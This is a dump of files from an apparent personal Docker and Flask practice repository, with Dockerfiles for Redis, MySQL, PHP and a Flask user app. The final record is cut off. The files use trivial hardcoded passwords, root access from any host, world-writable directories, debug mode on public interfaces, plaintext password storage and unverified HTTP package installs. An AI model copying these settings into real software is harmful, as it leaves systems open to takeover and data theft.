"text": "FROM centos:latest\n\nMAINTAINER [email protected]\n\nENV R_DIR /usr/local/redis\nENV I_DIR /opt/redis-6.0.9\n\n\nADD redis-6.0.9.tar.gz /usr/local\nRUN mv /usr/local/redis-6.0.9 $R_DIR\n# RUN yum -y upgrade\nRUN yum -y install gcc gcc-c++ make\nRUN cd $R_DIR \\\n && make \\\n && sed -i 's/\\# requirepass foobared/requirepass 123456/g' $R_DIR/redis.conf\n\n# && cd src/ \\\n# && make install PREFIX=/usr/local/redis\n#RUN mkdir -p /usr/local/redis && \\\n# cp $I_DIR/redis.conf $R_DIR/ && \\\n# cp $I_DIR/sentinel.conf $R_DIR/ && \\\n# cp $I_DIR/src/redis-benchmark $R_DIR && \\\n# cp $I_DIR/src/redis-check-aof $R_DIR && \\\n# cp $I_DIR/src/redis-check-dump $R_DIR && \\\n# cp $I_DIR/src/redis-cli $R_DIR && \\\n# cp $I_DIR/src/redis-sentinel $R_DIR && \\\n# cp $I_DIR/src/redis-server $R_DIR && \\\n# sed -i 's/\\# bind 127\\.0\\.0\\.1/bind 0\\.0\\.0\\.0/g' $R_DIR/redis.conf && \\\n# sed -i 's/\\# requirepass foobared/requirepass 123456/g' $R_DIR/redis.conf\n\n\nVOLUME [\"/usr/local/redis\"]\n\nEXPOSE 6379\n\n\nCMD [\"/usr/local/redis/src/redis-server\",\"/usr/local/redis/redis.conf\"]\n\n\n\n\n\n# logfile \"\"\n# dbfilename dump.rdb\n\n# docker build -t centos:redis .\n# docker run -p 6379:6379 --name redis -v /git.yonyou.com/docker/redis/redis.conf:/usr/local/redis/redis.conf -d centos:redis --network=mynet --ip 172.18.12.1 \n\n# docker run -p 6379:6379 --name redis -v /git.yonyou.com/docker/redis/redis.conf:/usr/local/redis/redis.conf -d centos:redis --net bridge --ip 192.168.0.2\n# docker exec -it redis bash\n# docker start redis \n# docker stop redis \n# ./redis-cli\n# auth \"yourpassword\"\n# ping\n# SELECT index\n# flushdb命令清除数据,\n\n# sudo docker network ls\n# 创建自定义网络类型,并且指定网段\n# sudo docker network create --subnet=192.168.0.0/16 staticnet\n\n# docker inspect redis 查看IP\n\n\n# docker build -t redis:ztc .\n# docker run -p 6379:6379 --name redis -d redis:ztc\n# docker exec -it redis bash\n\n\n# sudo docker ps -a\n# docker rm 容器id\n# docker rmi 镜像id\n# sudo docker stop redis\n# sudo docker images\n# sudo docker search redis\n\n\n# 查看网络模式\n# docker network ls \n\n# 创建一个新的bridge网络\n# docker network create --driver bridge --subnet=172.18.12.0/16 --gateway=172.18.1.1 mynet\n\n# 查看网络信息\n# docker network inspect mynet\n\n# 创建容器并指定容器ip\n# docker run -e TZ=\"Asia/Shanghai\" --privileged -itd -h hadoop01.com --name hadoop01 --network=mynet --ip 172.18.12.1 centos /usr/sbin/init"
},
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.610909104347229,
"avg_line_length": 17.399999618530273,
"blob_id": "fb9c33a606d9daf62b1ab6af2d88e4b3b853c6a7",
"content_id": "0dbbbc2e70b77e2595857a682032b7850b3b35d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 15,
"path": "/python/python-web/app11111.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# coding=utf-8\nfrom flask import Flask\napp = Flask(__name__)\n\[email protected](\"/\")\ndef hello():\n return \"Hello World!1\"\n\[email protected]('/main')\ndef main():\n return \"my name is main222\"\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=5000,debug=True)"
},
{
"alpha_fraction": 0.6404682397842407,
"alphanum_fraction": 0.6772575378417969,
"avg_line_length": 27.4761905670166,
"blob_id": "6493b52f8c6bb1023ae07acffb853ae41b2cd9af",
"content_id": "d9369b56680a39cfed98b93a1b8bbd8ae67b5139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 598,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 21,
"path": "/python/python-web/test/app.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nimport os\nfrom flask import Flask,current_app\n\napp = Flask(__name__)\n# app.config.from_object('setting.ProductionConfig')\napp.config.from_object('setting.DevelopmentConfig')\[email protected]('/')\ndef index():\n print(app.config['DB_SERVER'])\n print(app.config['DATABASE_URI'])\n print(current_app.config.get('DATABASE_URI'))\n print(os.urandom(24))\n return 'Hello, World!1a'\n\nif __name__==\"__main__\":\n # app.host='0.0.0.0'\n # app.port='89898'\n app.run(host=app.config['HOST'],port=app.config['PROT'],debug=app.config['DEBUG'])\n # app.run('0.0.0.0',8989,debug=True)\n"
},
{
"alpha_fraction": 0.6931818127632141,
"alphanum_fraction": 0.7007575631141663,
"avg_line_length": 13.722222328186035,
"blob_id": "ff6332bc6fe89aa98885eba6f700acef562b5851",
"content_id": "a68d6bb8362020b31678d268f27ef7fbb2d0a50f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 264,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 18,
"path": "/python/python-web/test/test001.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nimport os\nfrom ztc import zhang\n\nprint(os.name)\ntry:\n pass\nexcept ValueError as e:\n pass\nexcept ZeroDivisionError as e:\n pass\nexcept UnicodeError as e:\n pass\nfinally:\n pass\nif __name__ == '__main__':\n print(dir(zhang.kaishi))"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 16,
"blob_id": "029d344fddbcaa43ca7cd4ea909242ad0210766f",
"content_id": "a5485578438dc319f027e217f9a9d56946abf705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 84,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 5,
"path": "/python/python-web/test/ztc/zhang.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n' a test module '\ndef kaishi(a,b,c):\n print(a,b,c)"
},
{
"alpha_fraction": 0.6549019813537598,
"alphanum_fraction": 0.6705882549285889,
"avg_line_length": 18.69230842590332,
"blob_id": "65f8e713fc68f190ad0f8db51989fe490c854f17",
"content_id": "dbbba6b023e877bf08aa65bce7d8e35cc4b7340c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/python/python-web/apps/database/__init__.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom .. import app\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy(app,use_native_unicode='utf8')\n# def connMysql(app):\n# global db\n# print(2)\n# db = SQLAlchemy(app)\n# print(db)\n# # print(db)\n# print(db)"
},
{
"alpha_fraction": 0.7064056992530823,
"alphanum_fraction": 0.7206405401229858,
"avg_line_length": 36.53333282470703,
"blob_id": "57d032a26a88b987b61b22dc09fc8d3c799f5802",
"content_id": "f5c4d707ca93f2407e3f7393476a4800c6ea39e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 562,
"license_type": "no_license",
"max_line_length": 344,
"num_lines": 15,
"path": "/php/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM php:fpm-alpine3.9\n\n#MAINTAINER zhangtongchuan <[email protected]>\n\n#WORKDIR /var/www/html\n\n#CMD [\"php-fpm\"]\n\n\n\n# docker build -t php:nginx .\n\n# docker run --name myphp -v /git.yonyou.com/docker/php/www:/www -d php:nginx\n\n# docker run -p 9000:80 --name nginxphp --network testnet -v /git.yonyou.com/docker/php/www:/usr/share/nginx/html -v /git.yonyou.com/docker/php/log/:/var/log/nginx/ -v /git.yonyou.com/docker/php/conf/default.conf:/etc/nginx/conf.d/default.conf -v /git.yonyou.com/docker/php/conf/nginx.conf:/etc/nginx/nginx.conf --link myphp:nginx -d nginx:html"
},
{
"alpha_fraction": 0.6770708560943604,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 28.76785659790039,
"blob_id": "dd4aa215f426509b30406b9fadd58f9e7011b4e8",
"content_id": "94f4f76aa23ced84abf600ce3f0c858e48e61880",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1666,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 56,
"path": "/python/python-web/setting.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n\nclass Config(object):\n # ENV='development' # 'production'\n DEBUG=True\n # TESTING=True\n # PROPAGATE_EXCEPTIONS=True\n # PRESERVE_CONTEXT_ON_EXCEPTION=True\n # TRAP_HTTP_EXCEPTIONS=True\n # TRAP_BAD_REQUEST_ERRORS=None\n # SECRET_KEY='abcdefghijklmnopkuxyzw'\n # SESSION_COOKIE_NAME='session'\n # SESSION_COOKIE_DOMAIN=None\n # SESSION_COOKIE_PATH='/'\n # SESSION_COOKIE_HTTPONLY=True\n # SESSION_COOKIE_SECURE=False\n # SESSION_COOKIE_SAMESITE=None\n # PERMANENT_SESSION_LIFETIME=timedelta(days=31)\n # SESSION_REFRESH_EACH_REQUEST=True\n # USE_X_SENDFILE=False\n # SERVER_NAME=None\n # APPLICATION_ROOT='/'\n # PREFERRED_URL_SCHEME='http'\n # MAX_CONTENT_LENGTH=None\n # JSON_AS_ASCII=True\n # JSON_SORT_KEYS=True\n # JSONIFY_PRETTYPRINT_REGULAR=False\n # JSONIFY_MIMETYPE='application/json'\n # TEMPLATES_AUTO_RELOAD=None\n # EXPLAIN_TEMPLATE_LOADING=False\n # MAX_COOKIE_SIZE=4093\n HOST='0.0.0.0'\n PROT='5000'\n DB_SERVER = '192.168.1.56'\n # SQLALCHEMY_DATABASE_URI='mysql+pymysql://root:[email protected]:3306/mypython?charset=utf8'\n # CREATE DATABASE mypython CHARSET=UTF8;\n SQLALCHEMY_DATABASE_URI='mysql+pymysql://root:[email protected]:3306/mypython?charset=utf8'\n \n # SQLALCHEMY_DATABASE_URI=\"mysql://root:[email protected]:3306/mydata\"\n SQLALCHEMY_COMMIT_ON_TEARDOWN=True\n SQLALCHEMY_TRACK_MODIFICATIONS=True\n # SQLALCHEMY_TRACK_MODIFICATIONS\n # @property\n # def DATABASE_URI(self): # Note: all caps\n # return 'mysql://user@{}/foo'.format(self.DB_SERVER)\n\nclass ProductionConfig(Config):\n DEBUG=False\n Zhang=\"kaishi\"\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n\nclass TestingConfig(Config):\n TESTING = True"
},
{
"alpha_fraction": 0.7166666388511658,
"alphanum_fraction": 0.7277777791023254,
"avg_line_length": 19.11111068725586,
"blob_id": "2700c7ef1cfe71345af4f3b5a0caac495d9d32d6",
"content_id": "8b666e97db95a83a22efec3eea4067b8d4ecd164",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 180,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/python/python-web/apps/routers/test.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\n\ntestIndex=Blueprint('test_index',__name__)\n\[email protected]('/test')\ndef test_index():\n return 'abc'"
},
{
"alpha_fraction": 0.6815952658653259,
"alphanum_fraction": 0.6992481350898743,
"avg_line_length": 28.413461685180664,
"blob_id": "023be47f063915c57ee6c39001a32eb345d3c73b",
"content_id": "39cf5f0233066f557d0ec5c12520b8a7a6d1dc0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 3389,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 104,
"path": "/python/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM python:3.7-alpine\n#MAINTAINET \"[email protected]\"\n# 虚拟机中的目录\nWORKDIR /app\n\n# 设置变量\nENV FLASK_APP run.py\nENV FLASK_RUN_HOST 0.0.0.0\nENV FLASK_ENV development\nENV FLASK_DEBUG TRUE\n\n# COPY ./package.json /app\nADD ./python-web/ /app\nRUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories\nRUN apk --update --upgrade add mysql-dev\\\n build-base \n\n#RUN apk --update --upgrade add \\\n\n# # bundle 安装相关的依赖\n# git \\\n# curl \\\n# # mysql2 依赖\n# mysql-dev \\\n# # 基础设施,比如gcc相关的东西\n# build-base \\\n# # nokogiri 相关依赖\n# libxslt-dev \\\n# libxml2-dev \\\n# # 图片处理相关依赖\n# imagemagick \\\n# # tz相关,如果没有bundle的时候会报错\n# tzdata \\\n# nodejs \\\n# yarn \\\n# && rm -rf /var/cache/apk/*\n#libmysqlclient-dev\n\n#RUN pip install virtualenv\n#RUN virtualenv --no-site-packages venv\n#RUN source venv/bin/activate\nRUN pip install flask -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\n#RUN pip install flask-mysqldb -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install pymysql -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install flask-sqlalchemy -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\n# RUN pip install sqlalchemy -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install -U flask-cors -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install flask-blueprint -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\n# RUN pip freeze > requirements.txt\n# 安装\n#pip install pipreqs\n# 在当前目录生成\n#pipreqs . --encoding=utf8 --force\n\n#RUN ls\n#RUN pip list\n#RUN pip install --upgrade pip\n#RUN pip list\n#RUN mkdir /app/json\n#COPY /git.yonyou.com/FC/package.json /app/ 报错 \n# copy 是从另一个容器拷贝\n#VOLUME [\"/git.yonyou.com/docker/python/\"] 主机目录无法指定\n#RUN ls #-i http://mirrors.aliyun.com/pypi/simple\n#RUN pip install flask==1.1.1\n#RUN apt install libmysqlclient-dev\n#RUN pip install mysql==0.0.2\n#RUN pip install sqlalchemy\n#RUN pip install python-mysql\n#RUN pip install -U flask-ocrs\n#RUN pip install flask-blueprint\n\n#sudo service docker restart \n\n\n# 暴露端口\nEXPOSE 5000 \n\nCMD [\"flask\", \"run\"]\n\n\n# docker build -t python:flask .\n# 查看结果:\n# docker image ls\n# docker rmi python:flask\n# sudo docker run -p 5000:5000 --name python --network testnet -v /git.yonyou.com/docker/python/python-web:/app -d python:flask\n# docker run -p 5000:5000 --name python -v /git.yonyou.com/docker/python/python-web:/app -d python:flask --link mysql\n#sudo docker inspect mysql\n# 镜像名 pythonhello 后面,什么都不用写,因为在 Dockerfile 中已经指定了 CMD。否则,就得把进程的启动命令加在后面:\n# -p 外网:内网\n# docker run -p 80:5000 pythonhello\n# 查看容器 \n# docker ps\n# 删除容器docker rm 083084e11bc5\n# 进入容器:\n# docker exec -it pythonhello /bin/bash\n# 访问容器内应用:\n# curl http://localhost:4000\n#docker stop <容器 ID>\n#docker restart <容器 ID>\n\n# docker stop python\n# docker start python\n# docker restart python\n# docker system df\n"
},
{
"alpha_fraction": 0.6879432797431946,
"alphanum_fraction": 0.6992907524108887,
"avg_line_length": 32.619049072265625,
"blob_id": "e54c6b4901fd19fbcc377a7f9665483a48cf0592",
"content_id": "4719b006b1834f20ce9cad1e3217e555ee76415d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 705,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 21,
"path": "/python/python-web/apps/model/User.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom datetime import datetime \nfrom .Base import Base\nfrom ..database import db\n\nclass User(Base,db.Model):\n __tablename__='user'\n id=db.Column('id',db.Integer,primary_key=True,autoincrement=True)\n name=db.Column('username',db.String(50),nullable=True,unique=True)\n pwd=db.Column('password',db.String(50),nullable=True)\n email = db.Column(db.String(64), unique=True, index=True)\n sort=db.Column(db.Integer)\n addtime = db.Column('add_time',db.DateTime(),default=datetime.now)\n def __init__(self):\n pass\n def queryByNameAndPwd(self):\n print(self.name)\n return db.session.query(self).filter().all()\n def __repr__(self):\n return '<User %r>' % self.name"
},
{
"alpha_fraction": 0.6763990521430969,
"alphanum_fraction": 0.6846715211868286,
"avg_line_length": 26.399999618530273,
"blob_id": "dce10ca4cdaa873c8a65c64199c24c8c06dc9c5b",
"content_id": "94098aa54a619e820126b6c4c91bf58dbe38d207",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2127,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 75,
"path": "/python/python-web/apps/__init__.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n# import sys\nfrom flask import Flask,make_response,request,redirect,url_for\nfrom flask_cors import *\n# from .database import db\n# from flask_sqlalchemy import SQLAlchemy\n\n# sys.path.append('.')\n\n# app = Flask(__name__,static_folder='mystatic', static_url_path='/myurl',template_folder='mytemplate')\napp = Flask(__name__,static_folder='static', static_url_path='/static',template_folder='templates')\napp.config.from_object('setting.DevelopmentConfig')\nCORS(app, supports_credentials=True)\nfrom .routers import Router\n# print('1')\n# connMysql(app)\n# db.init_app(app)\n# print(db)\n\n# print(dir(app))\n# print(connMysql)\n# db.init_app(app)\n\n# DIALECT = 'mysql'\n# DRIVER = 'pymysql'\n# USERNAME = 'root'\n# PASSWORD = '808069'\n# HOST = '127.0.0.1'\n# PORT = '3306'\n# DATABASE = 'cms'\n\n# SQLALCHEMY_DATABASE_URI = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(\n# DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE\n# )\n# print(SQLALCHEMY_DATABASE_URI)\n# db = SQLAlchemy(app)\n# print(db)\n\n# print(dir(db))\[email protected]_first_request\ndef before_first_request():\n print(\"before first request,第一次请求前的操作\")\[email protected]_request\ndef before_request():\n # print(request.cookies.get('username'))\n # flag = -1\n # urlList = [\n # '/user/login',\n # '/user/loginsubmit',\n # '/user/loginout'\n # ]\n # try:\n # flag = urlList.index(request.path)\n # except:\n # flag = -1\n # # print(flag)\n # if flag==-1 and request.cookies.get('username')==None:\n # return redirect(url_for('user_index.user_login'))\n print(\"before request, 每一次请求前都会执行\")\n # return 'before'\[email protected]_request\ndef after_request(response):\n response = make_response(response)\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'\n response.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n print(\"after request,加工响应对象\")\n return response\[email protected]_request\ndef teardown_request(e):\n print(\"teardown_request, 请求之后一定执行\")\n # print(e)\n\nRouter(app)\n"
},
{
"alpha_fraction": 0.6709677577018738,
"alphanum_fraction": 0.7096773982048035,
"avg_line_length": 30.0222225189209,
"blob_id": "4cb87c2deb817ea7087a1c0dcf6657d9ddab9ebb",
"content_id": "ca1e29c61c859253a9c0b669079b5dd0b7734d90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 45,
"path": "/mysql/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM mysql:5.7\n\nMAINTAINER [email protected]\n\nWORKDIR /etc/mysql/\n\n\nRUN chmod -R 777 /etc/mysql/\nRUN chmod -R 777 /var/log/mysql/\nRUN chmod -R 777 /var/lib/mysql\n\n#WORKDIR /mysql_data\n#ENV MYSQL_ROOT_PASSWORD root\n#RUN echo $PWD \\\n# ls -al\n\nEXPOSE 3306\n\n# docker build -t mysql:ztc .\n# docker run -p 3306:3306 --name mysql -e MYSQL_ROOT_PASSWORD=root -v /git.yonyou.com/docker/mysql/conf/my.conf:/etc/mysql/my.conf -v /git.yonyou.com/docker/mysql/logs/:/var/log/mysql/ -v /git.yonyou.com/docker/mysql/data:/mysql_data -d mysql:ztc \n\n\n\n\n\n\n## docker stop mysql\n## docker start mysql\n# docker network create -d bridge testnet\n\n# docker build -t mysql:data .\n# docker run -p 3306:3306 --name mysql -e MYSQL_ROOT_PASSWORD=root -v /git.yonyou.com/docker/mysql/conf/:/etc/mysql/ -v /git.yonyou.com/docker/mysql/logs/:/var/log/mysql/ -v /git.yonyou.com/docker/mysql/data:/var/lib/mysql -d mysql:data\n### docker run -p 3306:3306 --name mysql --network testnet -e MYSQL_ROOT_PASSWORD=root -v /git.yonyou.com/docker/mysql/conf/:/etc/mysql/ -v /git.yonyou.com/docker/mysql/logs/:/var/log/mysql/ -v /git.yonyou.com/docker/mysql/data:/var/lib/mysql -d mysql:data\n# docker exec -it mysql bash\n# mysql -u root -p\n#GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;\n#FLUSH PRIVILEGES;\n\n# 127.0.0.1\n# root\n# root\n# mysql\n\n\n# docker network create --subnet=172.18.0.0/16 -d nat testnet"
},
{
"alpha_fraction": 0.7320442199707031,
"alphanum_fraction": 0.7430939078330994,
"avg_line_length": 26.615385055541992,
"blob_id": "739fa3d8dd786c57e50883ef5add8824e99e0124",
"content_id": "be0c18da2ef7c329d930d51a04e04abe34398472",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/nginx/html/test/js/b.js",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "\n\n// window.addEventListener('DOMContentLoaded',function(){\n// \tconsole.log('window.DOMContentLoaded')\n// })\ndocument.addEventListener('DOMContentLoaded',function(event){\n\tevent = event || window.event\n\tevent.cancelBubble=true\n\tevent.stopPropagation()\n\tevent.preventDefault()\n\ta = 4\n\tconsole.log(args)\n\tlet a = 222\n\tconsole.log('document.DOMContentLoaded')\n})\n\n"
},
{
"alpha_fraction": 0.6415332555770874,
"alphanum_fraction": 0.6518533825874329,
"avg_line_length": 29.638710021972656,
"blob_id": "2e882a996ed2835b491307c781729a64801652ad",
"content_id": "af71e5161dd45aff7e3accb29760245c28e955df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5220,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 155,
"path": "/python/python-web/apps/routers/user.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template,request,redirect,url_for,Response,make_response\nfrom datetime import datetime,timedelta\n# from datetime import \nimport json\nfrom ..model.User import User\nuserIndex=Blueprint('user_index',__name__)\n\"\"\"\n 查询所有用户数据\n User.query.all()\n\n 查询有多少个用户\n User.query.count()\n\n 查询第1个用户\n User.query.first()\n User.query.get(1) # 根据id查询\n\n 查询id为4的用户[3种方式]\n User.query.get(4)\n User.query.filter_by(id=4).all() # 简单查询 使用关键字实参的形式来设置字段名\n User.query.filter(User.id == 4).all() # 复杂查询 使用恒等式等其他形式来设置条件\n\n 查询名字结尾字符为g的所有用户[开始 / 包含]\n User.query.filter(User.name.endswith(\"g\")).all()\n User.query.filter(User.name.startswith(\"w\")).all()\n User.query.filter(User.name.contains(\"n\")).all()\n User.query.filter(User.name.like(\"%n%g\")).all() 模糊查询\n\n 查询名字和邮箱都以li开头的所有用户[2种方式]\n User.query.filter(User.name.startswith(\"li\"), User.email.startswith(\"li\")).all()\n\n from sqlalchemy import and_\n User.query.filter(and_(User.name.startswith(\"li\"), User.email.startswith(\"li\"))).all()\n\n 查询age是25 或者 `email`以`itheima.com`结尾的所有用户\n from sqlalchemy import or_\n User.query.filter(or_(User.age == 25, User.email.endswith(\"itheima.com\"))).all()\n\n 查询名字不等于wang的所有用户[2种方式]\n from sqlalchemy import not_\n User.query.filter(not_(User.name == \"wang\")).all()\n User.query.filter(User.name != \"wang\").all()\n\n 查询id为[1, 3, 5, 7, 9]的用户\n User.query.filter(User.id.in_([1, 3, 5, 7, 9])).all()\n\n 所有用户先按年龄从小到大, 再按id从大到小排序, 取前5个\n User.query.order_by(User.age, User.id.desc()).limit(5).all()\n\n 分页查询, 每页3个, 查询第2页的数据\n pn = User.query.paginate(2, 3)\n pn.items 获取该页的数据 pn.page 获取当前的页码 pn.pages 获取总页数\n\"\"\"\n\n\[email protected]('/user')\ndef user_index():\n # User.createTable()\n data = {}\n try:\n # user = User()\n # user.name = '张彤川'\n # user.pwd='123456'\n # user.email = '[email protected]'\n # flag = User.add(user)\n # if flag==False :\n # raise Exception('添加失败')\n for i in range(1):\n user = User()\n user.name = 'zhangtongchuan'\n user.pwd='123456'\n user.email = '[email protected]'\n flag = User.add(user)\n if flag==False :\n raise Exception('添加失败')\n print(i)\n break\n except BaseException:\n # finally:\n\n data['success'] = False \n data['message'] = '添加数据失败'\n # return 'abc'\n else:\n data['success'] = True \n data['message'] = '添加数据成功'\n # return 'bad'\n print(json.dumps(data))\n return json.dumps(data,skipkeys=False, ensure_ascii=False, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None)\n # return 'user.index'\[email protected]('/user/querall',methods=['POST','GET'])\ndef user_all():\n # User.createTable()\n datalist = [] \n data = {}\n all_results = User.querall(User)\n for user in all_results:\n datauser={\n 'name': user.name,\n 'password': user.pwd,\n 'email': user.email\n }\n datalist.append(datauser)\n # print(user.name,user.pwd,user.email)\n # print(all_results)\n data['data'] = datalist\n data['success'] = True\n data['message'] = '查询成功'\n return json.dumps(data,ensure_ascii=False)\n return 'user.querall'\[email protected]('/user/<username>',methods=['POST','GET'])\ndef user_user(username):\n # print(request.cookies)\n return render_template('user/user.html',username=username)\n\[email protected]('/user/loginout',methods=['POST','GET'])\ndef user_loginout():\n response = make_response(redirect(url_for('user_index.user_login'))) # Response(\"设置cookie\")\n response.delete_cookie('username')\n return response\n return redirect(url_for('user_index.user_login'))\[email protected]('/user/loginsubmit',methods=['POST','GET'])\ndef user_loginsubmit():\n username = request.form.get('username')\n password = request.form.get('password')\n result = User.query.filter_by(name=username,pwd=password).all()\n if len(result) > 0:\n response = make_response(redirect(url_for('user_index.user_user',username=username))) # Response(\"设置cookie\")\n expires = datetime.now() + timedelta(days=30,hours=16) \n # ,expires=expires\n # print(expires)\n response.set_cookie('username',username,domain='0.0.0.0:8989')\n # print(username)\n # print(print(request.cookies.get('username')))\n return response\n # return redirect(url_for('user_index.user_user',username=username))\n else:\n return redirect(url_for('user_index.user_login'))\n\n\n # user = User()\n # user.name = username\n # user.pwd=password\n # result = user.queryByNameAndPwd()\n # print(result)\n # return 'afasdfas'\n # redirect('http://localhost:5000/hello')\[email protected]('/user/login',methods=['POST','GET'])\ndef user_login():\n # if request.method==\"POST\":\n \n # else:\n return render_template('user/login.html')"
},
{
"alpha_fraction": 0.6715542674064636,
"alphanum_fraction": 0.7184750437736511,
"avg_line_length": 27.45833396911621,
"blob_id": "ddc690f05a30c241bf33504beb790d83bea4aa90",
"content_id": "aa6330a29b627cb99a0755ea1123b5ea1143014e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 24,
"path": "/python/python-web/test/test.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n'''\nmkdir mypython\ncd mypython\nsudo apt-get install python-virtualenv\nsudo apt-get install python3-pip\nvirtualenv -p /usr/bin/python3 venv\n virtualenv --no-site-packages venv\nsource ./venv/bin/activate\n./venv/bipip3 install uwsgi\n./venv/bin/uwsgi --http :8000 --gi-file test.py \n\nsudo pip3 install Django==2.0.3\ndjango-admin startproject myweb\n\nuwsgi --http :8000 --chdir /home/setup/myweb --wsgi-file myweb/wsgi.py --master --processes 4 --threads 2 --stats 127.0.0.1:8001\n'''\nimport sys\nprint(sys.version)\n\ndef application(env, start_response):\n start_response('200 OK', [('Content-Type','text/html')])\n return [b'Hello World']"
},
{
"alpha_fraction": 0.7046728730201721,
"alphanum_fraction": 0.7046728730201721,
"avg_line_length": 28.77777862548828,
"blob_id": "b55cb6062017eb2b2fd715b946fb06c35721e91a",
"content_id": "88096d4cbc48fb2ba3f969f4a0ff0b0d2494d0e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 18,
"path": "/python/python-web/apps/utils/json.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
